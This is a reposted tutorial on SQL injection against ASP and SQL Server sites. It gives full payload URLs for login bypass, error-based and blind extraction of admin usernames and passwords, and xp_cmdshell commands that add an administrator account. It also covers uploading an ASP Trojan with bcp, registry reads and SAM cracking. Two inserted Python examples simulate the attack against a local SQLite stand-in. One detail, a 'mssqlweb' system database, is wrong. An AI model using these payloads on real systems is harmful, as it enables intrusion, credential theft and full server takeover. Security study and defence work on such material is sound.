SQL injection attack

xiaoxiao2021-03-06  14

SQL injection arrives through the ordinary WWW port and on the surface looks no different from normal web page access, so the firewalls on the market today raise no alert for it. If the administrator is not in the habit of reading the IIS logs, an intrusion may go unnoticed for a long time. The technique is also quite flexible, and unexpected situations come up constantly during an injection; whether you can analyse the specific situation and construct a clever SQL statement for it decides whether you obtain the data you want. By one estimate, more than 70% of web sites run ASP with Access or SQL Server, about 20% run PHP with MySQL, and the remaining less than 10% use something else. This article explains the principles, methods and process of SQL injection using SQL Server and ASP as the example (PHP injection is covered in another article by Zwell, a friend from the NB Alliance).

The overall idea of a SQL injection attack is:

- discover the SQL injection point;
- determine the back-end database type;
- determine whether xp_cmdshell can be executed;
- discover the web virtual directory;
- upload an ASP Trojan;
- obtain administrator privileges.

1. Judging whether a SQL injection vulnerability exists

In general, SQL injection appears in ASP dynamic pages that take parameters, of the form http://xxx.xxx.xxx/abc.asp?id=xx. A dynamic page may take one parameter or n parameters, and a parameter may be an integer or a string; there is no single rule. In short, any dynamic page that takes parameters and uses them to access a database may be subject to SQL injection; if the ASP programmer lacks security awareness and does not filter the necessary characters, the chance of SQL injection is high. To see the complete response of a dynamic page, adjust the IE configuration as follows.
In IE, open Tools - Internet Options - Advanced and untick "Show friendly HTTP error messages". To make the discussion concrete, the following analysis uses http://xxx.xxx.xxx/abc.asp?p=yy as the example, where yy may be an integer or a string.

1) Integer parameters

When the input parameter yy is an integer, the SQL statement in abc.asp is generally of the form

select * from <table> where <field> = yy

so the following three requests test whether SQL injection exists:

(1) http://xxx.xxx.xxx/abc.asp?p=yy' (append a single quote). The statement in abc.asp becomes select * from <table> where <field> = yy', and abc.asp runs abnormally.
(2) http://xxx.xxx.xxx/abc.asp?p=yy and 1=1. abc.asp runs normally, with the same result as http://xxx.xxx.xxx/abc.asp?p=yy.
(3) http://xxx.xxx.xxx/abc.asp?p=yy and 1=2. abc.asp runs abnormally.

If all three hold, abc.asp certainly has a SQL injection vulnerability.

2) String parameters

When the input parameter yy is a string, the SQL statement in abc.asp is generally of the form

select * from <table> where <field> = 'yy'

and the following three requests test whether SQL injection exists:

(1) http://xxx.xxx.xxx/abc.asp?p=yy' (append a single quote). The statement in abc.asp becomes select * from <table> where <field> = 'yy'', and abc.asp runs abnormally.
(2) http://xxx.xxx.xxx/abc.asp?p=yy' and '1'='1. abc.asp runs normally, with the same result as http://xxx.xxx.xxx/abc.asp?p=yy.
(3) http://xxx.xxx.xxx/abc.asp?p=yy' and '1'='2. abc.asp runs abnormally.

If all three hold, abc.asp certainly has a SQL injection vulnerability.

3) Special cases

Sometimes the ASP programmer filters characters such as single quotes to prevent SQL injection. The following methods can then be tried:

(1) Case variation. Because VBScript is not case sensitive, programmers usually filter either the all-uppercase or the all-lowercase form of a keyword and overlook mixed case, so SELECT can be replaced by select, SeLeCt and so on.
(2) Unicode/URL encoding. IIS implements internationalization through the Unicode character set, so the characters typed into IE can be submitted entirely as URL-encoded strings, for example + = %2B, space = %20 and so on; see Appendix I for URL encoding.
(3) ASCII encoding. Part or all of the input characters can be replaced by their ASCII codes, for example u = chr(85), a = chr(97) and so on; see Appendix II for the ASCII table.

2. Distinguishing the database server type

Access and SQL Server are the most commonly used database servers. Although both support standard SQL, there are differences between them, and different databases call for different attack methods, so they must be told apart.

1) Using the database server's system variables

SQL Server has system variables and functions such as user and db_name(), which not only identify SQL Server but also yield a lot of useful information.
For example:

(1) http://xxx.xxx.xxx/abc.asp?p=yy and user>0 not only determines whether the back end is SQL Server but also reveals the user name the page connects to the database as (user is nvarchar, so comparing it with an integer raises a conversion error whose message contains the value).
(2) http://xxx.xxx.xxx/abc.asp?p=yy and db_name()>0 not only determines whether it is SQL Server but also reveals the name of the database currently in use.

2) Using the system tables

The Access system table is MSysObjects, which is not accessible in a web environment; the SQL Server system table is sysobjects, which is accessible in a web environment. For the following two statements:

(1) http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from sysobjects)>0
(2) http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from msysobjects)>0

if the database is SQL Server, the first runs normally and the second abnormally; if it is Access, both run abnormally.
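The three-request test of section 1, and the difference between the concatenated query it detects and a parameterised one, as an added worked example (this is not code from the original article or from any product it mentions). It uses an in-memory SQLite database as a stand-in for the SQL Server back end; the table news, its columns and rows, and the page-emulating function names are assumptions made up for the example. The mechanics of appending ', and 1=1 and and 1=2 are exactly those of the URLs above, for both the integer and the string form.

```python
import sqlite3

# Constructed in-memory stand-in for the page's back end (assumption: SQLite is
# used only so the example runs offline; the table and its rows are made up).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, category TEXT);
        INSERT INTO news VALUES (1, 'first post',  'tech');
        INSERT INTO news VALUES (2, 'second post', 'tech');
        INSERT INTO news VALUES (3, 'third post',  'sport');
    """)
    return con

# --- the vulnerable pattern of abc.asp: the parameter is glued into the SQL text ---
def vulnerable_by_id(con, p):
    """Integer parameter: select * from news where id = <p>."""
    return con.execute("SELECT * FROM news WHERE id = " + p).fetchall()

def vulnerable_by_category(con, p):
    """String parameter: select * from news where category = '<p>'."""
    return con.execute("SELECT * FROM news WHERE category = '" + p + "'").fetchall()

# --- the hardened pattern: the value is bound, never parsed as SQL ---
def safe_by_id(con, p):
    return con.execute("SELECT * FROM news WHERE id = ?", (int(p),)).fetchall()

def safe_by_category(con, p):
    return con.execute("SELECT * FROM news WHERE category = ?", (p,)).fetchall()

def request(fetch, value):
    """One 'page request': ('ok', rows) when the page works, ('error', msg) when it fails."""
    try:
        return "ok", fetch(value)
    except (sqlite3.Error, ValueError) as exc:
        return "error", str(exc)

def looks_injectable(fetch, value, string_param=False):
    """The article's three requests. Only the combination counts: the quote alone
    also errors on safe_by_id (int() rejects it), which is why steps 2 and 3 exist."""
    baseline = request(fetch, value)
    quoted = request(fetch, value + "'")
    if string_param:
        always_true = request(fetch, value + "' and '1'='1")
        always_false = request(fetch, value + "' and '1'='2")
    else:
        always_true = request(fetch, value + " and 1=1")
        always_false = request(fetch, value + " and 1=2")
    return (baseline[0] == "ok"
            and quoted[0] == "error"          # step 1: yy' breaks the statement
            and always_true == baseline       # step 2: yy and 1=1 is unchanged
            and always_false != baseline)     # step 3: yy and 1=2 differs

if __name__ == "__main__":
    con = make_db()
    for name, fetch, value, is_str in [
        ("vulnerable integer", lambda v: vulnerable_by_id(con, v), "1", False),
        ("vulnerable string",  lambda v: vulnerable_by_category(con, v), "tech", True),
        ("safe integer",       lambda v: safe_by_id(con, v), "1", False),
        ("safe string",        lambda v: safe_by_category(con, v), "tech", True),
    ]:
        print(f"{name}: injectable = {looks_injectable(fetch, value, is_str)}")
```

The two safe functions fail the test for different reasons: the bound integer query rejects every probe (so the and 1=1 request no longer matches the baseline), and the bound string query treats tech' as a literal value and simply returns nothing, so step 1 never produces an error.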

3) Three key MSSQL system tables

sysdatabases: each database on Microsoft SQL Server occupies one row in this table. When SQL Server is first installed, sysdatabases contains entries for the master, model, msdb, mssqlweb and tempdb databases. The table is stored only in the master database. What it holds is very important: the names of all databases together with their ids and related information. The fields we use are:

name    the name of the database
dbid    the id of the database; dbid 1 to 5 belong to the five system databases master, model, msdb, mssqlweb and tempdb

select * from master.dbo.sysdatabases lists all database names.

sysobjects: every SQL Server database has this system table, which records every object created in the database (constraints, defaults, logs, rules, stored procedures and so on), one row per object. The fields of interest are name, id, xtype, uid and status: the object name, object id, object type, owner user id and object status. The object type (xtype) is one of:

C  = check constraint
D  = default or default constraint
F  = foreign key constraint
L  = log
FN = scalar function
IF = inline table function
P  = stored procedure
PK = primary key constraint (type is K)
RF = replication filter stored procedure
S  = system table
TF = table function
TR = trigger
U  = user table
UQ = unique constraint (type is K)
V  = view
X  = extended stored procedure

Rows with xtype='U' and status>0 are tables created by users; the object name is then the table name and the object id is the table's id. For example

select * from chouyfd.dbo.sysobjects where xtype='U' and status>0

lists the user-created tables in the database chouyfd.
syscolumns: every column of every table and view occupies one row, and every parameter of every stored procedure also occupies one row. The table exists in every database. The main fields are name, id and colid: the column name, the table id and the column id; the table id is the id just obtained from sysobjects. For example

select * from chouyfd.dbo.syscolumns where id=123456789

lists all columns of the table whose id is 123456789 in the database chouyfd.

3. Determining whether xp_cmdshell can be executed

If the account the page connects with has sa privileges and the extended stored procedure master.dbo.xp_cmdshell (which runs commands in the operating system's shell) executes correctly, the whole machine can be taken over completely by the following method, and all the later steps can be skipped.

(1) http://xxx.xxx.xxx/abc.asp?p=yy and user>0. abc.asp raises an error, but the error reveals the user name of the current database connection. dbo indicates the login owns the database; sa always maps to dbo, but so does any other login that owns the database, so if in doubt confirm with http://xxx.xxx.xxx/abc.asp?p=yy and is_srvrolemember('sysadmin')=1, which runs normally only for a sysadmin login.
(2) http://xxx.xxx.xxx/abc.asp?p=yy and db_name()>0. abc.asp raises an error, but the error reveals the name of the currently connected database.
(3) http://xxx.xxx.xxx/abc.asp?p=yy;exec master..xp_cmdshell "net user aaa bbb /add"-- directly adds the operating-system account aaa with password bbb. (master is the main SQL Server database; the semicolon tells SQL Server to finish the statement before it and then execute the one after it; "--" starts a comment, so everything after it is ignored and not executed.)
(4) http://xxx.xxx.xxx/abc.asp?p=yy;exec master..xp_cmdshell "net localgroup administrators aaa /add"-- adds the account aaa just created to the Administrators group.
(5) http://xxx.xxx.xxx/abc.asp?p=yy;backup database <database name> to disk='c:\inetpub\wwwroot\save.db' backs up the database's contents into the web directory, after which the file can be downloaded over HTTP (of course, the web virtual directory has to be known first).
(6) Recreate the Unicode vulnerability: use xp_cmdshell to copy cmd.exe into the executable virtual directory as c:\inetpub\scripts\cmd.exe (http://xxx.xxx.xxx/abc.asp?p=yy;exec master..xp_cmdshell 'copy <path to cmd.exe> c:\inetpub\scripts\cmd.exe'--); full control of the machine is then obtained through that vulnerability.

4. Discovering the web virtual directory
Only after the web virtual directory has been found can you decide where to put the ASP Trojan and go on to obtain user privileges. There are two relatively effective approaches. The first relies on experience: the web virtual directory is usually c:\inetpub\wwwroot, d:\inetpub\wwwroot, e:\inetpub\wwwroot and so on, and the executable virtual directory is usually c:\inetpub\scripts, d:\inetpub\scripts, e:\inetpub\scripts and so on.

The second is to traverse the system's directory structure and find the web virtual directory by analysing the results. First create a temporary table temp:

http://xxx.xxx.xxx/abc.asp?p=yy;create table temp(id nvarchar(255), num1 nvarchar(255), num2 nvarchar(255), num3 nvarchar(255));--

Then:

(1) xp_availablemedia returns all current drives; store them in temp:
http://xxx.xxx.xxx/abc.asp?p=yy;insert temp exec master.dbo.xp_availablemedia;--
Querying temp then yields the list of drives and related information.
(2) xp_subdirs returns the list of subdirectories; store it in temp:
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
(3) xp_dirtree returns all subdirectories recursively; store them in temp:
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

In this way the whole list of directories (folders) can be browsed. (The column lists match what each procedure returns: xp_availablemedia returns four columns, xp_subdirs one, and xp_dirtree two, subdirectory and depth; an insert with the wrong number of columns fails.)

If the contents of a file are needed, xp_cmdshell can be used:
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';--

or the bulk insert syntax can load a text file into the temporary table, for example
bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'

Browsing temp then shows the contents of index.asp. By analysing various ASP files, a great deal of system information and web configuration and management information can be obtained, even the connection password of the sa account.

Of course, if xp_cmdshell can be executed, it does all of this on its own:

http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\';--
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:\*.asp /s /a';--

Through xp_cmdshell we can see everything we want, including the W3SVC configuration:

http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id) exec master.dbo.xp_cmdshell 'cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc';--

If we do not have sa privileges, we can still use
http://xxx.xxx.xxx/abc.asp?p=yy;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

Notes:
(1) After each browse, delete everything in temp:
http://xxx.xxx.xxx/abc.asp?p=yy;delete from temp;--
(2) To browse the temp table (assuming testdb is the currently connected database name):
http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 id from testdb.dbo.temp)>0
fetches the id field of the first record in temp and compares it with an integer; abc.asp obviously fails, but the error message reveals the value of id. Assuming the value found is xyz, then
http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 id from testdb.dbo.temp where id not in ('xyz'))>0
reveals the id field of the second record, and so on.

5. Uploading an ASP Trojan

A so-called ASP Trojan is ASP code with special functions. Placed under the scripts directory of the web virtual directory, it can be executed by a remote client through IE, which gives user-level access to the system and a first degree of control over it. There are two relatively effective ways to upload an ASP Trojan.

1) Using the web site's remote management function

For maintenance, many web sites provide remote management features, and many sites also present different content to different users with different access rights.
To control user rights there is a page that asks for a user name and password; only after the correct values are entered can the next operation be performed, which allows web management such as uploading and downloading files, browsing directories and modifying the configuration. So if the correct user name and password can be obtained, an ASP Trojan can be uploaded, and sometimes user privileges and the ability to browse the system come directly, letting the complicated "discovering the web virtual directory" step above be skipped. The user name and password are usually stored in a table; finding that table solves the problem. Two effective methods are given below.

A. Injection. In theory the authentication page runs a statement of the form

select * from admin where username='xxx' and password='yyy'

and if the necessary characters are not filtered before it is actually run, SQL injection is easy. Enter abc' or 1=1-- in the user name box and 123 in the password box, and the statement becomes

select * from admin where username='abc' or 1=1-- ' and password='123'

The comment marker removes the password check, and because 1=1 is always true the statement succeeds for any user name and password, so the user easily deceives the system and obtains a legitimate identity.

B. Guessing. The basic idea is: guess all the database names, guess the table names in each database, analyse which tables may hold user names and passwords, guess the field names in those tables, and then guess the content of each record.

- Guessing all database names

http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)<>0

Because dbid 1 to 5 are the system databases, user-created databases start at 6. The name field is a character field, and comparing it with a number raises an error, so abc.asp fails but the error reveals the first database name; changing dbid to 7, 8, 9, 10, 11, 12 ... yields all the database names. The database name obtained is assumed to be testdb below.

- Guessing the name of the table of user accounts in the database

Guessing method: this relies on personal experience. Commonly used names are user, users, member, members, userlist, memberlist, userinfo, manager, admin, adminuser, systemuser, systemusers, sysuser, sysusers, sysaccounts, systemaccounts and so on, and the statement

http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from testdb.dbo.<table name>)>0

decides: if the table exists, abc.asp works normally, otherwise it fails. Loop until the name of the account table is found.
Reading method: SQL Server's table sysobjects stores core system information, including all tables and views, and it is accessible through the web. Rows with xtype='U' and status>0 are user-created tables, so by finding and analysing the name of each user table you can identify the one holding user names. The basic method is:

(1) http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 name from testdb.dbo.sysobjects where xtype='U' and status>0)>0

fetches the name of the first user-created table and compares it with an integer; abc.asp obviously fails, but the error message reveals the table name.

Assuming the table name found is xyz, then

(2) http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 name from testdb.dbo.sysobjects where xtype='U' and status>0 and name not in ('xyz'))>0

reveals the name of the second user-created table, and so on for all of them. From the table names it is usually possible to tell which one stores user names and passwords. This table is assumed to be admin below.

- Guessing the user-name and password field names

The admin table must have a user-name field and a password field; only with both field names can the work below continue. As before, there are two ways to obtain them.

Guessing method: this relies on experience with field names. The user-name field is commonly username, name, user, account and so on; the password field is commonly password, pass, pwd, passwd and so on. The statement

http://xxx.xxx.xxx/abc.asp?p=yy and (select count(username) from testdb.dbo.admin)>0

decides: select count(<field>) returns the number of rows of the table, so if the field exists abc.asp works normally, otherwise it fails. Loop until both field names are found.

Reading method: the basic statement is

http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 col_name(object_id('admin'),1) from testdb.dbo.sysobjects)>0

col_name(object_id('admin'),1) obtains the first field name of the known table; comparing it with an integer makes abc.asp fail, but the error reveals the field name. Replacing 1 with 2, 3, 4, 5, 6 ... yields all the field names.

- Guessing user names and passwords

The most common and also most effective way of guessing user names and passwords is the ASCII code decoding method. Although slow, it always works.
The basic idea is to guess the length of the field first and then guess the value of each position. Guessing the password works the same way as guessing the user name; the user name is used as the example below.

http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 len(username) from testdb.dbo.admin)=x   (x = 1, 2, 3, 4, 5, ... n; username is the user-name field and admin the table name)

When x takes a value i for which abc.asp runs normally, i is the length of the first user name.

For example, when http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 len(username) from testdb.dbo.admin)=8 runs normally, the first user name is 8 characters long. Then

http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 ascii(substring(username,m,1)) from testdb.dbo.admin)=n

(m runs from 1 to the length found in the previous step; m = 1, 2, 3, ... guesses the 1st, 2nd, 3rd, ... character; n is the ASCII value of 1-9, a-z, A-Z, that is any value from 1 to 127; admin is the system account table). When n takes a value i for which abc.asp runs normally, the character at position m of the user name is the one with ASCII code i. For example, when http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 ascii(substring(username,3,1)) from testdb.dbo.admin)=80 runs normally, the third character of the user name is P (ASCII 80); when http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 ascii(substring(username,9,1)) from testdb.dbo.admin)=33 runs normally, the ninth character is ! (ASCII 33). Having guessed the first user name and password, all the other user names and passwords can be guessed the same way.

Note: sometimes the password has been hashed with MD5 and has to be cracked with a special tool, or the password can simply be changed and changed back afterwards; see below.

Simple method: guess the user name with
http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 flag from testdb.dbo.admin where username>1)
where flag is any field of the admin table and username is the user-name field; abc.asp fails, but the error reveals the value of username. Similarly the second, third, ... user names can be obtained until all user names in the table are known. Guess the password with
http://xxx.xxx.xxx/abc.asp?p=yy and (select top 1 flag from testdb.dbo.admin where pwd>1)
where flag is any field of the admin table and pwd is the password field; abc.asp fails, but the error reveals the value of pwd.
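The length-then-character procedure above, as an added worked example (not code from the original article). It drives the same boolean oracle the article relies on, a page that either runs normally or fails, against an in-memory SQLite table standing in for testdb.dbo.admin; the admin row, the news table the page queries, and the class and function names are assumptions made up for the example. Because SQLite has no top, len, substring or ascii, the conditions use its equivalents length, substr and unicode with limit 1; the T-SQL spelling is in the comments. It goes one step beyond the article in the character step: instead of trying each ASCII value in turn, it binary-searches with ascii(...)>n, which needs about seven requests per character instead of up to 127.

```python
import sqlite3

# Constructed stand-in for the target (assumption: SQLite in memory so the example
# runs offline; the admin row and the news table abc.asp queries are made up).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'hello');
        CREATE TABLE admin (username TEXT, pwd TEXT);
        INSERT INTO admin VALUES ('webadmin', 'P@ss!');
    """)
    return con

class PageOracle:
    """Emulates abc.asp?p=1 and (<condition>): True when the page runs normally
    (the concatenated query returns a row), False on an error or an empty result."""
    def __init__(self, con):
        self.con = con
        self.requests = 0          # how many page requests the attack needed

    def __call__(self, condition):
        self.requests += 1
        sql = "SELECT * FROM news WHERE id = 1 and (" + condition + ")"
        try:
            return len(self.con.execute(sql).fetchall()) > 0
        except sqlite3.Error:
            return False

# SQLite spellings of the article's T-SQL conditions:
#   (select top 1 len(col) from table) = n
LEN_EQ = "(select length({col}) from {table} limit 1) = {n}"
#   (select top 1 ascii(substring(col, pos, 1)) from table) <op> n
CHAR_CMP = "(select unicode(substr({col}, {pos}, 1)) from {table} limit 1) {op} {n}"

def guess_length(oracle, table, col, max_len=64):
    """Step 1 of the article: try len = 1, 2, 3 ... until the page runs normally."""
    for n in range(1, max_len + 1):
        if oracle(LEN_EQ.format(col=col, table=table, n=n)):
            return n
    raise ValueError("no length matched: field is empty, NULL, or longer than max_len")

def guess_char(oracle, table, col, pos, lo=1, hi=127):
    """Step 2: find the ASCII code at position pos. Binary search on
    ascii(...) > mid keeps the answer inside [lo, hi] and halves it each request."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(CHAR_CMP.format(col=col, table=table, pos=pos, op=">", n=mid)):
            lo = mid + 1
        else:
            hi = mid
    # one confirming request catches values outside [lo, hi] (e.g. non-ASCII data)
    if not oracle(CHAR_CMP.format(col=col, table=table, pos=pos, op="=", n=lo)):
        raise ValueError(f"character {pos} is outside the searched ASCII range")
    return chr(lo)

def extract(oracle, table, col):
    """The whole procedure: length first, then every character in turn."""
    length = guess_length(oracle, table, col)
    return "".join(guess_char(oracle, table, col, pos) for pos in range(1, length + 1))

if __name__ == "__main__":
    oracle = PageOracle(make_db())
    user = extract(oracle, "admin", "username")
    pwd = extract(oracle, "admin", "pwd")
    print(f"username={user!r} pwd={pwd!r} after {oracle.requests} requests")
```

The oracle treats a database error and an empty result alike, exactly as the article does ("abc.asp runs abnormally"), so a NULL or empty field shows up as guess_length finding no match rather than as a wrong value.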
Similarly, the passwords of the second, third, ... users can be obtained until all passwords in the table are known. When the password is stored as an MD5 hash it can be changed instead:

http://xxx.xxx.xxx/abc.asp?p=yy;update testdb.dbo.admin set pwd='A0B923820DCC509A' where username='www';--

(A0B923820DCC509A is the 16-character MD5 hash of 1, so the password becomes 1; www is the user name already known.) The password can of course be changed back afterwards.

2) Using the table-export function

SQL Server has a bcp command that can write the contents of a table to a text file at a specified location.

Using this feature, we can first create a temporary table, insert an ASP Trojan into it line by line, and then export it as an ASP file with the bcp command. The command line is of the form

bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -S localhost -U sa -P foobar

(-S is the server on which the query runs, -U the user name and -P the password; the result is an uploaded runcommand.asp Trojan).

6. Obtaining administrator privileges

How? There are many ways to escalate privileges, and which to use depends on the specific situation of the system: upload a Trojan; modify an .ini file that runs automatically at boot (once the machine reboots, it is done for); copy cmd.exe into scripts to recreate the Unicode vulnerability by hand; download the SAM file and crack it to get all the operating-system user names and passwords; and so on.

7. Some special SQL Server techniques

1) Modifying the registry with extended stored procedures

Another useful set of built-in extended stored procedures is the xp_reg* family (xp_regaddmultistring, xp_regdeletekey, xp_regdeletevalue, xp_regenumkeys, xp_regenumvalues, xp_regread, xp_regremovemultistring, xp_regwrite). An attacker can use them to read and modify the registry, for example to read SAM values, allow null-session connections, or set programs to run automatically. For example

exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'

determines what kind of session connections the server allows, and

exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities'

shows all SNMP community strings configured on the server; with this information an attacker may be able to reconfigure network devices on the same network.

2) Changing the server with other stored procedures

The xp_servicecontrol procedure lets the user start and stop services.

For example:

exec master..xp_servicecontrol 'start','schedule'
exec master..xp_servicecontrol 'start','server'

Other useful procedures:

xp_availablemedia       shows the available drives on the machine
xp_dirtree              obtains a directory tree
xp_enumdsn              enumerates the ODBC data sources on the server
xp_loginconfig          obtains the server's security information
xp_makecab              lets the user create a compressed file on the server
xp_ntsec_enumdomains    enumerates the domains the server can reach
xp_terminate_process    terminates a process given its process id

Appendix I: URL encoding table (RFC 1738)

Character   Meaning of the special character              URL encoding
#           marks a specific position in a document       %23
%           encodes special characters                    %25
&           separates different variable values           %26
+           stands for a space inside a variable value    %2B
\           backslash                                     %5C
=           joins a key and its value                     %3D
?           marks the start of the query string           %3F
space       space                                         %20
.           full stop                                     %2E
:           colon                                         %3A

Appendix II: ASCII table (partial)

Dec  Hex  Char        Dec  Hex  Char
 80  50   P            32  20   (space)
 81  51   Q            33  21   !
 82  52   R            34  22   "
 83  53   S            35  23   #
 84  54   T            36  24   $
 85  55   U            37  25   %
 86  56   V            38  26   &
 87  57   W            39  27   '
 88  58   X            40  28   (
 89  59   Y            41  29   )
 90  5A   Z            42  2A   *
 91  5B   [            43  2B   +
 92  5C   \            44  2C   ,
 93  5D   ]            45  2D   -
 94  5E   ^            46  2E   .
 95  5F   _            47  2F   /
 96  60   `

Please credit the original source when reposting: https://www.9cbs.com/read-50055.html
